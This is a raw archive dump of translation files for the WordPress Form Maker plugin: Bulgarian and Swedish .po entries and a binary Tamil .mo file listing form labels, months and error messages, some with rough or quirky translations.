#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Изберете поле "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Изберете дата"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-ta.mo000060400000013304152434416630011600 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
.T
�
�
�
�
�
�
^�
SWV�+ARbo|���P�
)
%B
7h
�
�
)�
,�
!�=Q�5+U�p�����N������y���p�G)Rq4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:05+0400
PO-Revision-Date: 2015-05-22 17:05+0400
Last-Translator: 
Language-Team: 
Language: ta
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
ஏப்ரல்பகுதி குறியீட்டுஆகஸ்ட்சென்ட்நகரம்நாடுடிசம்பர்டாலர்கள்பிழை, மின்னஞ்சல் அனுப்பப்படவில்லை.பிழை, கோப்பு நகர்த்த முடியாது.பிழை, தவறான பாதுகாப்பு குறியீடு.பிப்ரவரிமுதல்இருந்துசெல்ல ஜனவரிஜூலைஜூன்கடந்தமார்ச்மே 2005.நடுநிலைஎதுவும் சமர்ப்பிக்கப்பட்டது.நவம்பர்அக்டோபர்தொலைபேசி எண்தபால் / ஜிப் குறியீடுஅளவுமீட்டமை ஒரு தேதி தேர்வுவெளிக்கள தேர்வு செப்டெம்பர்மன்னிக்கவும், நீங்கள் இந்த வகை கோப்பை பதிவேற்ற அனுமதி இல்லை.மாநிலம் / மாகாணம் / பிராந்தியம்தெரு முகவரிதெரு முகவரி வரி 2Theகோப்பு அனுமதிக்கப்பட்ட அளவை விட அதிகமாகஇந்த புலம் %s ஒரு தனிப்பட்ட உள்ளீடு தேவைப்படுகிறது மற்றும் இந்த மதிப்பு ஏற்கனவே சமர்ப்பிக்கப்பட்டது.இந்த ஒரு செல்லுபடியாகும் மின்னஞ்சல் முகவரி அல்ல.பெயர்வேண்டும்சரிபார்ப்பு இணைப்பு தவறானது.நீங்கள் முன்னாள் தேதிகள் தேர்ந்தெடுக்க முடியாது. தற்போதைய ஒரு இருந்து, ஒரு தேதி தேர்வு.உங்கள் மின்னஞ்சல் முகவரியை ஏற்கனவே சரிபார்க்கப்பட்டது.உங்கள் மின்னஞ்சல் வெற்றிகரமாக பரிசோதிக்கப்பட்டது.உங்கள் மின்னஞ்சல் சரிபார்ப்பு காலாவதியானது.உங்கள் படிவத்தை வெற்றிகரமாக சமர்ப்பிக்கப்பட்டது.உங்கள் IP தடுக்கப்பட்டது. இணைய நிர்வாகியை தொடர்பு கொள்கஉங்கள் மதிப்பெண் குறைவாக இருக்க வேண்டும்புலத்தில் தேவைப்படுகிறது.மதிப்பு இடையே இருக்க வேண்டும் languages/form_maker-sv_SE.po000060400000056701152434416630012226 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:04+0400\n"
"PO-Revision-Date: 2015-05-22 17:04+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: sv\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Gatunamn"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Gatuadress Linje 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Ort"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Stat / Provins / Region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Post / Postnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Land"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Januari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Mars"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Maj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Juni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juli!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "augusti"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "December"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Fel, fel säkerhetskod."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Din ip är svartlistad. Kontakta webbplatsens administratör"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Filen överskrider den tillåtna storleken på"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Tyvärr, du får inte ladda upp denna typ av fil."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Fel, kan filen inte flyttas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Detta fält %s kräver ett unikt inresa och detta värde redan in."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Fel, var e-post inte skickas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Ingenting lämnades in."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Formuläret framgångsrikt in."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Fel, var e-post inte skickas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Din e-postadress som redan har kontrollerats."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Ditt mail har verifierats."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Din e-postverifiering har gått ut."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Verifieringslänken är ogiltig."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "fältet är obligatoriskt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Detta är inte en giltig e-postadress."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Du kan inte välja tidigare datum. Välj ett datum från och med den nuvarande."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "Den"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Värdet måste vara mellan "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Mängd"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Din poäng bör vara mindre än "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Först"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Senast"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "mellan"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Riktnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefonnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cent"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Från"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "För att"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "gå "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Återställ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Välj ett fältv"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Välj ett datum"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

